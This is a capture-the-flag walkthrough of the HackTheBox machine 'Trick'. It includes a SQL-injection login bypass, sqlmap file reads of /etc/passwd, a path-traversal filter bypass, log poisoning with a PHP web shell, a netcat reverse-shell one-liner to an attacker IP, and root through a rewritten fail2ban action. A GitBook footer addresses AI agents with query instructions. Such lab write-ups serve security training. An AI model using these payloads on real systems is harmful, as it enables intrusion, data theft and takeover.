> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-trick.md).

# HTB -  Trick

## Enumeration and Foothold

### NMAP

```bash
──(ajay㉿kali)-[~]
└─$ nmap -sV -v -sT 10.129.227.180
Starting Nmap 7.98 ( <https://nmap.org> ) at 2026-05-25 00:08 -0400
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open  smtp?
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
80/tcp open  http    nginx 1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### DNS

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ dig -x 10.129.227.180 @10.129.227.180

; <<>> DiG 9.20.20-1-Debian <<>> -x 10.129.227.180 @10.129.227.180
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24351
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: cfe91e217c907ce38d86567f6a13cc47469608394e4724b7 (good)
;; QUESTION SECTION:
;180.227.129.10.in-addr.arpa.   IN      PTR

;; ANSWER SECTION:
180.227.129.10.in-addr.arpa. 604800 IN  PTR     trick.htb.

;; AUTHORITY SECTION:
227.129.10.in-addr.arpa. 604800 IN      NS      trick.htb.

;; ADDITIONAL SECTION:
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1

;; Query time: 47 msec
;; SERVER: 10.129.227.180#53(10.129.227.180) (UDP)
;; WHEN: Mon May 25 00:12:55 EDT 2026
;; MSG SIZE  rcvd: 165

```

hostname : `trick.htb`

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ dig axfr @10.129.227.180 trick.htb 

; <<>> DiG 9.20.20-1-Debian <<>> axfr @10.129.227.180 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 51 msec
;; SERVER: 10.129.227.180#53(10.129.227.180) (TCP)
;; WHEN: Mon May 25 00:10:38 EDT 2026
;; XFR size: 6 records (messages 1, bytes 231)
```

Successful zone transfer and found a new subdomain `preprod-payroll.trick.htb`. we can add it to the /etc/hosts file.

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaL9qP0bzKps4sLwoNCkF%2Fimage.png?alt=media&amp;token=6b068ac8-18ef-4c56-b530-c5ca9bdb69ca" alt=""><figcaption></figcaption></figure>

Nothing interesting here.

### preprod-payroll.trick.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHQeEHbV9qqvI5rnV310O%2Fimage.png?alt=media&amp;token=ae531d60-df3c-499f-964d-8e3290cde30d" alt=""><figcaption></figcaption></figure>

By using the below payload we were able to bypass the login page.

`' OR 1=1 —`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FINTaffuUqrHvOTZ4c2wh%2Fimage.png?alt=media&amp;token=9d3e26b4-1235-4ab2-b085-cc07b7f87aca" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fifel7a8SHjwxkP8V2QEa%2Fimage.png?alt=media&amp;token=b524f2ec-432d-488a-86ad-42e1a0e3ca1b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhEtI38cbQlWet8YLMIJQ%2Fimage.png?alt=media&amp;token=74eef3c4-a262-4a3b-b950-c70176be69ba" alt=""><figcaption></figcaption></figure>

i can try to use sqlmap to leverage the sql injection vulnerability to dump database.

#### SQLMAP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWmV7Npxd18xKnWsYJ1Qv%2Fimage.png?alt=media&amp;token=427c0a6b-f85e-42ca-b1ee-dc802e438f05" alt=""><figcaption></figcaption></figure>

Save the login request to a file and run using sqlmap

```bash
┌──(ajay㉿kali)-[~]
└─$ sqlmap -r request.txt --batch --level=3 --risk=2 --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.10.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   <https://sqlmap.org>

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3VwwJbFuq1mHR37bx5nH%2Fimage.png?alt=media&amp;token=41ec657e-e782-473c-a2ea-62ccf4363cc9" alt=""><figcaption></figcaption></figure>

database : `payroll_db`

```bash
┌──(ajay㉿kali)-[~]
└─$ # Get tables
sqlmap -r request.txt --batch -D payroll_db --tables
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFzkKoEUXtquo1Ly1xGJ4%2Fimage.png?alt=media&amp;token=13181fb0-39d0-4cf6-b7e8-a0e382c4570a" alt=""><figcaption></figcaption></figure>

```bash
──(ajay㉿kali)-[~]
└─$ sqlmap -r request.txt -p username --batch --privileges
        ___
       __H__                                                                                                                                                                                                                                
 ___ ___[,]_____ ___ ___  {1.10.2#stable}                                                                                                                                                                                                   
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                   
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                   
      |_|V...       |_|   <https://sqlmap.org>                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:48:59 /2026-05-25/

[00:48:59] [INFO] parsing HTTP request from 'request.txt'
[00:48:59] [INFO] resuming back-end DBMS 'mysql' 
[00:48:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: username=test' AND 1680=(SELECT (CASE WHEN (1680=1680) THEN 1680 ELSE (SELECT 6469 UNION SELECT 1415) END))-- Mjii&password=test

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=test' OR (SELECT 8353 FROM(SELECT COUNT(*),CONCAT(0x7176766b71,(SELECT (ELT(8353=8353,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xErA&password=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test' AND (SELECT 4269 FROM (SELECT(SLEEP(5)))GBEE)-- TXlO&password=test
---
[00:48:59] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[00:48:59] [INFO] fetching database users privileges
[00:48:59] [WARNING] reflective value(s) found and filtering out
[00:48:59] [INFO] retrieved: ''remo'@'localhost''
[00:49:00] [INFO] retrieved: 'FILE'
database management system users privileges:
[*] 'remo'@'localhost' [1]:
    privilege: FILE

[00:49:00] [INFO] fetched data logged to text files under '/home/ajay/.local/share/sqlmap/output/preprod-payroll.trick.htb'

[*] ending @ 00:49:00 /2026-05-25/

```

The current user have FILE Privileges.

With the file read we can read internal files.

#### Exploiting SQL File Read Privileges

```bash
──(ajay㉿kali)-[~]
└─$ sqlmap -r request.txt --batch --file-read="/etc/passwd"
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.10.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   <https://sqlmap.org>

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:56:12 /2026-05-25/

[10:56:12] [INFO] parsing HTTP request from 'request.txt'
[10:56:12] [INFO] resuming back-end DBMS 'mysql' 
[10:56:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: username=test' AND 1680=(SELECT (CASE WHEN (1680=1680) THEN 1680 ELSE (SELECT 6469 UNION SELECT 1415) END))-- Mjii&password=test

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=test' OR (SELECT 8353 FROM(SELECT COUNT(*),CONCAT(0x7176766b71,(SELECT (ELT(8353=8353,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xErA&password=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test' AND (SELECT 4269 FROM (SELECT(SLEEP(5)))GBEE)-- TXlO&password=test
---
[10:56:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:56:12] [INFO] fingerprinting the back-end DBMS operating system
[10:56:12] [INFO] the back-end DBMS operating system is Linux
[10:56:12] [INFO] fetching file: '/etc/passwd'

do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[10:56:12] [WARNING] reflective value(s) found and filtering out
[10:56:12] [INFO] retrieved: '2351'
[10:56:12] [INFO] the local file '/home/ajay/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd' and the remote file '/etc/passwd' have the same size (2351 B)
files saved to [1]:
[*] /home/ajay/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd (same file)

[10:56:12] [INFO] fetched data logged to text files under '/home/ajay/.local/share/sqlmap/output/preprod-payroll.trick.htb'

[*] ending @ 10:56:12 /2026-05-25/

```

The `/etc/passwd` file is successfully written to our local machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fzk4h51V6UZU5wzqQcM1u%2Fimage.png?alt=media&amp;token=cc85e4a5-207d-442f-9bf3-a6e00e854f10" alt=""><figcaption></figcaption></figure>

Found another user called micheal.

We know that the application is running on NGINX Server. We can write to read the configuration files. `--file-read="/etc/nginx/sites-enabled/default`”

```bash
┌──(ajay㉿kali)-[~/…/sqlmap/output/preprod-payroll.trick.htb/files]
└─$ cat _etc_nginx_sites-enabled_default
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        server_name trick.htb;
        root /var/www/html;

        index index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}

server {
        listen 80;
        listen [::]:80;

        server_name preprod-marketing.trick.htb;

        root /var/www/market;
        index index.php;
        

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
        }
}

server {
        listen 80;
        listen [::]:80;

        server_name preprod-payroll.trick.htb;

        root /var/www/payroll;
        index index.php;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}
                                                                
```

Reading the sites-enabled file leaked another internal subdomain which nginx is loading. we can add the new host `preprod-marketing.trick.htb` to the hosts file.

### Preprod-marketing.trick.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFbcFVBRq1ux4VR5CpDly%2Fimage.png?alt=media&amp;token=af150f96-96b5-4bc1-9901-f95068ce7f52" alt=""><figcaption></figcaption></figure>

Using the payload : `../../../../../etc/passwd` resulted in nothing so possibly filtering in place and moved to next payload.

`….//….//….//….//etc/passwd`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUPvXXxmL7qy0ajRGPC85%2Fimage.png?alt=media&amp;token=774efcd5-9554-42dc-b1ff-a92d06338fea" alt=""><figcaption></figcaption></figure>

Next we can use the LFI to get a RCE via Log Poisoning

### RCE via Log Poisoning

See if we have access to any of the access log

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRPzBmJRBKR7r6jSpN6kZ%2Fimage.png?alt=media&amp;token=0c4ee467-bc4d-44aa-be91-257565576833" alt=""><figcaption></figcaption></figure>

We can use curl to send our payload.

```bash
──(ajay㉿kali)-[~]
└─$ curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "<http://preprod-marketing.trick.htb/index.php>"
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Business Oriented CSS Template</title>
    <link href="<https://fonts.googleapis.com/css?family=Open+Sans>" rel="stylesheet" /> <!-- <https://fonts.google.com/> -->
    <link href="css/bootstrap.min.css" rel="stylesheet" /> <!-- <https://getbootstrap.com/> -->
    <link href="fontawesome/css/all.min.css" rel="stylesheet" /> <!-- <https://fontawesome.com/> -->
    <link href="css/templatemo-business-oriented.css" rel="stylesheet" />
<SNIP>
```

I have used the below payload for the reverse shell

`rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.15.201+1234+%3e%2ftmp%2ff`

## Shell as Michael

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdLhVZyUIAkwf26SXvPZZ%2Fimage.png?alt=media&amp;token=915a00c0-4162-46c2-a287-01052331aafd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvbfOE94K7OLmOTN3lZ4X%2Fimage.png?alt=media&amp;token=5b3858cd-d00a-4b94-85ec-b5b95812b47a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUWnG7BKJtx48yzx9xRRm%2Fimage.png?alt=media&amp;token=637ba329-5c26-41c9-af8f-4271659ebb81" alt=""><figcaption></figcaption></figure>

michael belongs to a supplementary group called security (gid=1002). This points directly back to checking if the security group has write access over the Fail2Ban configuration files or directories.

### Exploiting Fail2ban restart

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMi0yCKVVox0Jw6Bt4pJ6%2Fimage.png?alt=media&amp;token=57d5414d-1d90-4856-b73f-72eb9c19ad63" alt=""><figcaption></figcaption></figure>

The security group has permissions on action.d

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPVKi7oEEEwbIySEtFYGl%2Fimage.png?alt=media&amp;token=22112d68-bf14-430a-9663-8890df429a42" alt=""><figcaption></figcaption></figure>

We can utilise the iptables for the purpose of escalation but first we can backup the existing fields before modifying.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCTQXyw2U52phDMLhX9nd%2Fimage.png?alt=media&amp;token=c9d50efd-dbd8-4425-b9c2-fd3a0df54d1f" alt=""><figcaption></figcaption></figure>

before proceeding further i got the ssh rpivate key of micheal we can utilize it to get a stable shell through SSH

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTFPbAdcSRg3L4XhtfQGW%2Fimage.png?alt=media&amp;token=45da20fe-a72d-4a97-ac4f-4c91e027951e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fjzdbo7tZaPO0fF3v6Kiu%2Fimage.png?alt=media&amp;token=e33b020e-0ab7-43c1-b6ab-0ad3415cc632" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFfLqAla9UOWcP5rsp5m4%2Fimage.png?alt=media&amp;token=f83b883b-c688-43e7-b14a-b9f6e1e29a7c" alt=""><figcaption></figcaption></figure>

removed the iptables-multiport.conf and replaced it with new one.

## Shell as Root

```bash
michael@trick:/etc/fail2ban/action.d$ echo -e "[Definition]\nactionstart = chmod +s /bin/bash" > iptables-multiport.conf
michael@trick:/etc/fail2ban/action.d$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.
michael@trick:/etc/fail2ban/action.d$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
michael@trick:/etc/fail2ban/action.d$ bash -p
bash-5.0# whoami
root
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-trick.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
